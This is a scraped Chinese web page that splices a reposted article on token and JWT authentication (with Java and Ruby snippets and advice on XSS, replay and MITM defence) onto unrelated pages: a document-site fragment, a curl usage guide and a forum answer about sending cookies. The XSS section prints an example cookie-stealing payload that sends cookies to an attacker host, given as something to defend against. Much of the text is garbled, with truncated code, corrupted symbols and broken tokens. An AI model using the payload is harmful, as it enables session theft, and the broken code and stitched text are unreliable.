基于Token的WEB后台认证机制
基于Token的WEB后台认证机制
几种常用的认证机制
HTTP Basic Auth
HTTP Basic Auth简单点说明就是每次请求API时都提供用户的username和password，简言之，Basic Auth是配合RESTful API 使用的最简单的认证方式，只需提供用户名密码即可，但由于有把用户名密码暴露给第三方客户端的风险，在生产环境下被使用的越来越少。
几种常用的认证机制
HTTP Basic Auth
HTTP Basic Auth简单点说明就是每次请求API时都提供用户的username和password，简言之，Basic Auth是配合RESTful API 使用的最简单的认证方式，只需提供用户名密码即可，但由于有把用户名密码暴露给第三方客户端的风险，在生产环境下被使用的越来越少。因此，在开发对外开放的RESTful API时，尽量避免采用HTTP Basic Auth
OAuth（开放授权）是一个开放的授权标准，允许用户让第三方应用访问该用户在某一web服务上存储的私密的资源（如照片，视频，联系人列表），而无需将用户名和密码提供给第三方应用。
OAuth允许用户提供一个令牌，而不是用户名和密码来访问他们存放在特定服务提供者的数据。每一个令牌授权一个特定的第三方系统（例如，视频编辑网站)在特定的时段（例如，接下来的2小时内）内访问特定的资源（例如仅仅是某一相册中的视频）。这样，OAuth让用户可以授权第三方网站访问他们存储在另外服务提供者的某些特定信息，而非所有内容下面是OAuth2.0的流程：
这种基于OAuth的认证机制适用于个人消费者类的互联网产品，如社交类APP等应用，但是不太适合拥有自有认证权限管理的企业应用；
Cookie Auth
Cookie认证机制就是为一次请求认证在服务端创建一个Session对象，同时在客户端的浏览器端创建了一个Cookie对象；通过客户端带上来Cookie对象来与服务器端的session对象匹配来实现状态管理的。默认的，当我们关闭浏览器的时候，cookie会被删除。但可以通过修改cookie 的expire time使cookie在一定时间内有效；
Token Auth
Token Auth的优点
Token机制相对于Cookie机制又有什么好处呢？
支持跨域访问: Cookie是不允许垮域访问的，这一点对Token机制是不存在的，前提是传输的用户认证信息通过HTTP头传输.
无状态(也称：服务端可扩展行):Token机制在服务端不需要存储session信息，因为Token 自身包含了所有登录用户的信息，只需要在客户端的cookie或本地介质存储状态信息.
更适用CDN: 可以通过内容分发网络请求你服务端的所有资料（如：javascript，HTML,图片等），而你的服务端只要提供API即可.
去耦: 不需要绑定到一个特定的身份验证方案。Token可以在任何地方生成，只要在你的API被调用的时候，你可以进行Token生成调用即可.
更适用于移动应用: 当你的客户端是一个原生平台（iOS, Android，Windows 8等）时，Cookie是不被支持的（你需要通过Cookie容器进行处理），这时采用Token认证机制就会简单得多。
CSRF:因为不再依赖于Cookie，所以你就不需要考虑对CSRF（跨站请求伪造）的防范。
性能: 一次网络往返时间（通过数据库查询session信息）总比做一次HMACSHA256计算 的Token验证和解析要费时得多.
不需要为登录页面做特殊处理: 如果你使用Protractor 做功能测试的时候，不再需要为登录页面做特殊处理.
基于标准化:你的API可以采用标准化的 JSON Web Token (JWT). 这个标准已经存在多个后端库（.NET, Ruby, Java,Python, PHP）和多家公司的支持（如：Firebase,Google, Microsoft）.
基于JWT的Token认证机制实现
JSON Web Token（JWT）是一个非常轻巧的规范。这个规范允许我们使用JWT在用户和服务器之间传递安全可靠的信息。其
一个JWT实际上就是一个字符串，它由三部分组成，头部、载荷与签名。载荷（Payload）
{ "iss": "Online JWT Builder",
"aud": "www.example.com",
"sub": "",
"GivenName": "Johnny",
"Surname": "Rocket",
"Email": "",
"Role": [ "Manager", "Project Administrator" ]
iss: 该JWT的签发者，是否使用是可选的；
sub: 该JWT所面向的用户，是否使用是可选的；
aud: 接收该JWT的一方，是否使用是可选的；
exp(expires): 什么时候过期，这里是一个Unix时间戳，是否使用是可选的；
iat(issued at): 在什么时候签发的(UNIX时间)，是否使用是可选的；其他还有：
nbf (Not Before)：如果当前时间在nbf里的时间之前，则Token不被接受；一般都会留一些余地，比如几分钟；，是否使用是可选的；
将上面的JSON对象进行[base64编码]可以得到下面的字符串。这个字符串我们将它称作JWT的Payload（载荷）。
eyJpc3MiOiJKb2huIFd1IEpXVCIsImlhdCI6MTQ0MTU5MzUwMiwiZXhwIjoxNDQxNTk0NzIyLCJhdWQiOiJ3d3cuZXhhbXBsZS5jb20iLCJzdWIiOiJqcm9ja2V0QGV4YW1wbGUuY29tIiwiZnJvbV91c2VyIjoiQiIsInRhcmdldF91c2VyIjoiQSJ9
小知识：Base64是一种基于64个可打印字符来表示二进制数据的表示方法。由于2的6次方等于64，所以每6个比特为一个单元，对应某个可打印字符。三个字节有24个比特，对应于4个Base64单元，即3个字节需要用4个可打印字符来表示。JDK 中提供了非常方便的 BASE64Encoder 和 BASE64Decoder，用它们可以非常方便的完成基于 BASE64 的编码和解码
头部（Header）JWT还需要一个头部，头部用于描述关于该JWT的最基本的信息，例如其类型以及签名所用的算法等。这也可以被表示成一个JSON对象。
"typ": "JWT",
"alg": "HS256"
在头部指明了签名算法是HS256算法。当然头部也要进行BASE64编码，编码后的字符串如下：
eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9
签名（Signature）将上面的两个编码后的字符串都用句号.连接在一起（头部在前），就形成了:
.eyJmcm9tX3VzZXIiOiJCIiwidGFyZ2V0X3VzZXIiOiJBIn0
最后，我们将上面拼接完的字符串用HS256算法进行加密。在加密的时候，我们还需要提供一个密钥（secret）。如果我们用mystar作为密钥的话，那么就可以得到我们加密后的内容:
rSWamyAYwuHCo7IFAgd1oRpSP7nzL7BF5t7ItqpKViM
最后将这一部分签名也拼接在被签名的字符串后面，我们就得到了完整的JWT:
.eyJmcm9tX3VzZXIiOiJCIiwidGFyZ2V0X3VzZXIiOiJBIn0.rSWamyAYwuHCo7IFAgd1oRpSP7nzL7BF5t7ItqpKViM
在我们的请求URL中会带上这串JWT字符串：
下面我们从一个实例来看如何运用JWT机制实现认证：
第一次认证：第一次登录，用户从浏览器输入用户名/密码，提交后到服务器的登录处理的Action层（Login Action）；
Login Action调用认证服务进行用户名密码认证，如果认证通过，Login Action层调用用户信息服务获取用户信息（包括完整的用户信息及对应权限信息）；
返回用户信息后，Login Action从配置文件中获取Token签名生成的秘钥信息，进行Token的生成；
生成Token的过程中可以调用第三方的JWT Lib生成签名后的JWT数据；
完成JWT数据签名后，将其设置到COOKIE对象中，并重定向到首页，完成登录过程；
基于Token的认证机制会在每一次请求中都带上完成签名的Token信息，这个Token信息可能在COOKIE中，也可能在HTTP的Authorization头中；
客户端（APP客户端或浏览器）通过GET或POST请求访问资源（页面或调用API）；
认证服务作为一个Middleware HOOK 对请求进行拦截，首先在cookie中查找Token信息，如果没有找到，则在HTTP Authorization Head中查找；
如果找到Token信息，则根据配置文件中的签名加密秘钥，调用JWT Lib对Token信息进行解密和解码；
完成解码并验证签名通过后，对Token中的exp、nbf、aud等信息进行验证；
全部通过后，根据获取的用户的角色权限信息，进行对请求的资源的权限逻辑判断；
如果权限逻辑判断通过则通过Response对象返回；否则则返回HTTP 401；
对Token认证的五点认识
对Token认证机制有5点直接注意的地方：
一个Token就是一些信息的集合；
在Token中包含足够多的信息，以便在后续请求中减少查询数据库的几率；
服务端需要对cookie和HTTP Authrorization Header进行Token信息的检查；
基于上一点，你可以用一套token认证代码来面对浏览器类客户端和非浏览器类客户端；
因为token是被签名的，所以我们可以认为一个可以解码认证通过的token是由我们系统发放的，其中带的信息是合法有效的；
JWT的JAVA实现
Java中对JWT的支持可以考虑使用开源库；JJWT实现了JWT, JWS, JWE 和 JWA RFC规范；下面将简单举例说明其使用：生成Token码
import javax.crypto.spec.SecretKeyS
import javax.xml.bind.DatatypeC
import java.security.K
import io.jsonwebtoken.*;
import java.util.D
private String createJWT(String id, String issuer, String subject, long ttlMillis) {
SignatureAlgorithm signatureAlgorithm = SignatureAlgorithm.HS256;
long nowMillis = System.currentTimeMillis();
Date now = new Date(nowMillis);
byte[] apiKeySecretBytes = DatatypeConverter.parseBase64Binary(apiKey.getSecret());
Key signingKey = new SecretKeySpec(apiKeySecretBytes, signatureAlgorithm.getJcaName());
JwtBuilder builder = Jwts.builder().setId(id)
.setIssuedAt(now)
.setSubject(subject)
.setIssuer(issuer)
.signWith(signatureAlgorithm, signingKey);
if (ttlMillis &= 0) {
long expMillis = nowMillis + ttlM
Date exp = new Date(expMillis);
builder.setExpiration(exp);
return builder.compact();
解码和验证Token码
import javax.xml.bind.DatatypeC
import io.jsonwebtoken.J
import io.jsonwebtoken.C
private void parseJWT(String jwt) {
Claims claims = Jwts.parser()
.setSigningKey(DatatypeConverter.parseBase64Binary(apiKey.getSecret()))
.parseClaimsJws(jwt).getBody();
System.out.println("ID: " + claims.getId());
System.out.println("Subject: " + claims.getSubject());
System.out.println("Issuer: " + claims.getIssuer());
System.out.println("Expiration: " + claims.getExpiration());
基于JWT的Token认证的安全问题
确保验证过程的安全性
如何保证用户名/密码验证过程的安全性；因为在验证过程中，需要用户输入用户名和密码，在这一过程中，用户名、密码等敏感信息需要在网络中传输。因此，在这个过程中建议采用HTTPS，通过SSL加密传输，以确保通道的安全性。
如何防范XSS Attacks
浏览器可以做很多事情，这也给浏览器端的安全带来很多隐患，最常见的如：XSS攻击：跨站脚本攻击(Cross Site Scripting)；如果有个页面的输入框中允许输入任何信息，且没有做防范措施，如果我们输入下面这段代码：
&img src="x" /& a.src='https://hackmeplz.com/yourCookies.png/?cookies=’
+document.return a}())"
这段代码会盗取你域中的所有cookie信息，并发送到 hackmeplz.com；那么我们如何来防范这种攻击呢？
XSS攻击代码过滤移除任何会导致浏览器做非预期执行的代码，这个可以采用一些库来实现（如：js下的js-xss，JAVA下的XSS HTMLFilter，PHP下的TWIG）；如果你是将用户提交的字符串存储到数据库的话（也针对SQL注入攻击），你需要在前端和服务端分别做过滤；
采用HTTP-Only Cookies通过设置Cookie的参数： HttpO Secure 来防止通过JavaScript 来访问Cookie；如何在Java中设置cookie是HttpOnly呢？Servlet 2.5 API 不支持 cookie设置HttpOnly建议升级Tomcat7.0，它已经实现了Servlet3.0或者通过这样来设置：
//设置cookie
response.addHeader("Set-Cookie", "uid=112; Path=/; HttpOnly");
//设置多个cookie
response.addHeader("Set-Cookie", "uid=112; Path=/; HttpOnly");
response.addHeader("Set-Cookie", "timeout=30; Path=/ HttpOnly");
//设置https的cookie
response.addHeader("Set-Cookie", "uid=112; Path=/; S HttpOnly");
在实际使用中，我们可以使FireCookie查看我们设置的Cookie 是否是HttpOnly；
如何防范Replay Attacks
所谓重放攻击就是攻击者发送一个目的主机已接收过的包，来达到欺骗系统的目的，主要用于身份认证过程。比如在浏览器端通过用户名/密码验证获得签名的Token被木马窃取。即使用户登出了系统，黑客还是可以利用窃取的Token模拟正常请求，而服务器端对此完全不知道，以为JWT机制是无状态的。针对这种情况，有几种常用做法可以用作参考：1、时间戳 +共享秘钥这种方案，客户端和服务端都需要知道：
auth_header = JWT.encode({
user_id: 123,
iat: Time.now.to_i,
# 指定token发布时间
exp: Time.now.to_i + 2
# 指定token过期时间为2秒后，2秒时间足够一次HTTP请求，同时在一定程度确保上一次token过期，减少replay attack的概率；
}, "&my shared secret&")
RestClient.get("http://api.example.com/", authorization: auth_header)
class ApiController & ActionController::Base
attr_reader :current_user
before_action :set_current_user_from_jwt_token
def set_current_user_from_jwt_token
payload = JWT.decode(request.authorization, nil, false)
@current_user = User.find(payload['user_id'])
JWT.decode(request.authorization, current_user.api_secret)
now = Time.now.to_i
if payload['iat'] & now || payload['exp'] & now
rescue JWT::DecodeError
2、时间戳 +共享秘钥+黑名单 （类似的做法）客户端
auth_header = JWT.encode({
user_id: 123,
jti: rand(2 && 64).to_s,
iat: Time.now.to_i,
exp: Time.now.to_i + 2
}, "&my shared secret&")
RestClient.get("http://api.example.com/", authorization: auth_header)
def set_current_user_from_jwt_token
payload = JWT.decode(request.authorization, nil, false)
@current_user = User.find(payload['user_id'])
JWT.decode(request.authorization, current_user.api_secret)
now = Time.now.to_i
if payload['iat'] & now || payload['exp'] & now
key = "#{payload['user_id']}:#{payload['jti']}"
if redis.getset(key, "1")
redis.expireat(key, payload['exp'] + 2)
如何防范MITM （Man-In-The-Middle）Attacks
所谓MITM攻击，就是在客户端和服务器端的交互过程被监听，比如像可以上网的咖啡馆的WIFI被监听或者被黑的代理服务器等；针对这类攻击的办法使用HTTPS，包括针对分布式应用，在服务间传输像cookie这类敏感信息时也采用HTTPS；所以云计算在本质上是不安全的。
参考目录：
转载自：http://www.cnblogs.com/xiekeli/p/5607107.html
用云栖社区APP，舒服~
【云栖快讯】直播推荐——现在报名3月12日编程语言系列讲座，与行业资深专家一起学习Python、C++、JavaScript、Java！还可在活动页面领取红包，百分百中奖哦！&&
文章1196篇
基于云安全大数据能力实现，通过防御SQL注入、XSS跨站脚本、常见Web服务器插件漏洞、木马...
服务底层使用经国家密码管理局检测认证的硬件密码机，通过虚拟化技术，帮助用户满足数据安全方面的...
一项针对阿里云资源和互联网应用进行监控的服务。云监控服务可用于收集获取阿里云资源的监控指标，...
为您提供简单高效、处理能力可弹性伸缩的计算服务，帮助您快速构建更稳定、安全的应用，提升运维效...C# WebRequest发起Http Post请求模拟登陆并cookie处理示例_百度文库
两大类热门资源免费畅读
续费一年阅读会员，立省24元！
C# WebRequest发起Http Post请求模拟登陆并cookie处理示例
阅读已结束，下载本文需要
想免费下载更多文档？
定制HR最喜欢的简历
你可能喜欢curl网站开发指南 - 阮一峰的网络日志
curl网站开发指南
我一向以为，只是一个编程用的函数库。
最近才发现，这个命令本身，就是一个无比有用的网站开发工具，请看我整理的它的用法。
===================================
curl网站开发指南
阮一峰 整理
是一种命令行工具，作用是发出网络请求，然后得到和提取数据，显示在"标准输出"（stdout）上面。
它支持多种协议，下面举例讲解如何将它用于网站开发。
一、查看网页源码
直接在curl命令后加上网址，就可以看到网页源码。我们以网址www.sina.com为例（选择该网址，主要因为它的网页代码较短）：
　　$ curl www.sina.com
　　&!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"&
　　&html&&head&
　　&title&301 Moved Permanently&/title&
　　&/head&&body&
　　&h1&Moved Permanently&/h1&
　　&p&The document has moved &a href="http://www.sina.com.cn/"&here&/a&.&/p&
　　&/body&&/html&
如果要把这个网页保存下来，可以使用`-o`参数，这就相当于使用wget命令了。
　　$ curl -o [文件名] www.sina.com
二、自动跳转
有的网址是自动跳转的。使用`-L`参数，curl就会跳转到新的网址。
　　$ curl -L www.sina.com
键入上面的命令，结果就自动跳转为www.sina.com.cn。
三、显示头信息
`-i`参数可以显示http response的头信息，连同网页代码一起。
　　$ curl -i www.sina.com
　　HTTP/1.0 301 Moved Permanently
　　Date: Sat, 03 Sep :10 GMT
　　Server: Apache/2.0.54 (Unix)
　　Location: http://www.sina.com.cn/
　　Cache-Control: max-age=3600
　　Expires: Sun, 04 Sep :10 GMT
　　Vary: Accept-Encoding
　　Content-Length: 231
　　Content-Type: text/ charset=iso-8859-1
　　Age: 3239
　　X-Cache: HIT from sh201-9.sina.com.cn
　　Connection: close
　　&!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"&
　　&html&&head&
　　&title&301 Moved Permanently&/title&
　　&/head&&body&
　　&h1&Moved Permanently&/h1&
　　&p&The document has moved &a href="http://www.sina.com.cn/"&here&/a&.&/p&
　　&/body&&/html&
`-I`参数则是只显示http response的头信息。
四、显示通信过程
`-v`参数可以显示一次http通信的整个过程，包括端口连接和http request头信息。
　　$ curl -v www.sina.com
　　* About to connect() to www.sina.com port 80 (#0)
Trying 61.172.201.195... connected
　　* Connected to www.sina.com (61.172.201.195) port 80 (#0)
　　& GET / HTTP/1.1
　　& User-Agent: curl/7.21.3 (i686-pc-linux-gnu) libcurl/7.21.3 OpenSSL/0.9.8o zlib/1.2.3.4 libidn/1.18
　　& Host: www.sina.com
　　& Accept: */*
　　* HTTP 1.0, assume close after body
　　& HTTP/1.0 301 Moved Permanently
　　& Date: Sun, 04 Sep :39 GMT
　　& Server: Apache/2.0.54 (Unix)
　　& Location: http://www.sina.com.cn/
　　& Cache-Control: max-age=3600
　　& Expires: Sun, 04 Sep :39 GMT
　　& Vary: Accept-Encoding
　　& Content-Length: 231
　　& Content-Type: text/ charset=iso-8859-1
　　& X-Cache: MISS from sh201-19.sina.com.cn
　　& Connection: close
　　&!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"&
　　&html&&head&
　　&title&301 Moved Permanently&/title&
　　&/head&&body&
　　&h1&Moved Permanently&/h1&
　　&p&The document has moved &a href="http://www.sina.com.cn/"&here&/a&.&/p&
　　&/body&&/html&
　　* Closing connection #0
如果你觉得上面的信息还不够，那么下面的命令可以查看更详细的通信过程。
　　$ curl --trace output.txt www.sina.com
　　$ curl --trace-ascii output.txt www.sina.com
运行后，请打开output.txt文件查看。
五、发送表单信息
发送表单信息有GET和POST两种方法。GET方法相对简单，只要把数据附在网址后面就行。
　　$ curl example.com/form.cgi?data=xxx
POST方法必须把数据和网址分开，curl就要用到--data参数。
　　$ curl -X POST --data "data=xxx" example.com/form.cgi
如果你的数据没有经过表单编码，还可以让curl为你编码，参数是`--data-urlencode`。
　　$ curl -X POST--data-urlencode "date=April 1" example.com/form.cgi
六、HTTP动词
curl默认的HTTP动词是GET，使用`-X`参数可以支持其他动词。
　　$ curl -X POST www.example.com
　　$ curl -X DELETE www.example.com
七、文件上传
假定文件上传的表单是下面这样：
　　&form method="POST" enctype='multipart/form-data' action="upload.cgi"&
　　　　&input type=file name=upload&
　　　　&input type=submit name=press value="OK"&
　　&/form&
你可以用curl这样上传文件：
　　$ curl --form upload=@localfilename --form press=OK [URL]
八、Referer字段
有时你需要在http request头信息中，提供一个referer字段，表示你是从哪里跳转过来的。
　　$ curl --referer http://www.example.com http://www.example.com
九、User Agent字段
这个字段是用来表示客户端的设备信息。服务器有时会根据这个字段，针对不同设备，返回不同格式的网页，比如手机版和桌面版。
iPhone4的User Agent是
　　Mozilla/5.0 (iP U; CPU iPhone OS 4_0 like Mac OS X; en-us) AppleWebKit/532.9 (KHTML, like Gecko) Version/4.0.5 Mobile/8A293 Safari/
curl可以这样模拟：
　　$ curl --user-agent "[User Agent]" [URL]
十、cookie
使用`--cookie`参数，可以让curl发送cookie。
　　$ curl --cookie "name=xxx" www.example.com
至于具体的cookie的值，可以从http response头信息的`Set-Cookie`字段中得到。
`-c cookie-file`可以保存服务器返回的cookie到文件，`-b cookie-file`可以使用这个文件作为cookie信息，进行后续的请求。
　　$ curl -c cookies http://example.com
　　$ curl -b cookies http://example.com
十一、增加头信息
有时需要在http request之中，自行增加一个头信息。`--header`参数就可以起到这个作用。
　　$ curl --header "Content-Type:application/json" http://example.com
十二、HTTP认证
有些网域需要HTTP认证，这时curl需要用到`--user`参数。
　　$ curl --user name:password example.com
【参考资料】
HTTP/2 协议的主要目的是提高网页性能。
春节前，我看到 Nginx 加入了 HTTP/2 的 server push 功能，就很想试一下。
Docker 是一个容器工具，提供虚拟环境。很多人认为，它改变了我们对软件的认识。
2013年发布至今， Docker 一直广受瞩目，被认为可能会改变软件行业。所有回答(3)
主要难点在于cookie的获取上面。之前我看园子里大神爬300WQQ数据，然后学着它爬空间日志，只能爬自己的，爬详细资料什么的老出问题，说是需要登录，请求时需要发送cookie，这点比较难，除非手动的伪装cookie发送过去，但有效性就是问题，复用性更是问题，同求答案，怎么样才能不让cookie成为困扰
这个问题我不清楚，只提供个思路。可以去Git上找些开源的项目看看别人如何处理
1、先调用会写入Cookie的地址，然后拿到响应头中的Set-Cookie的值
2、之后调用别的地址的时候，将上一步取到的Cookie值写入到请求头的Cookie中就可以了。
清除回答草稿
&&&您需要以后才能回答，未注册用户请先。他的最新文章
他的热门文章
您举报文章：
举报原因：
原文地址：
原因补充：
(最多只允许输入30个字)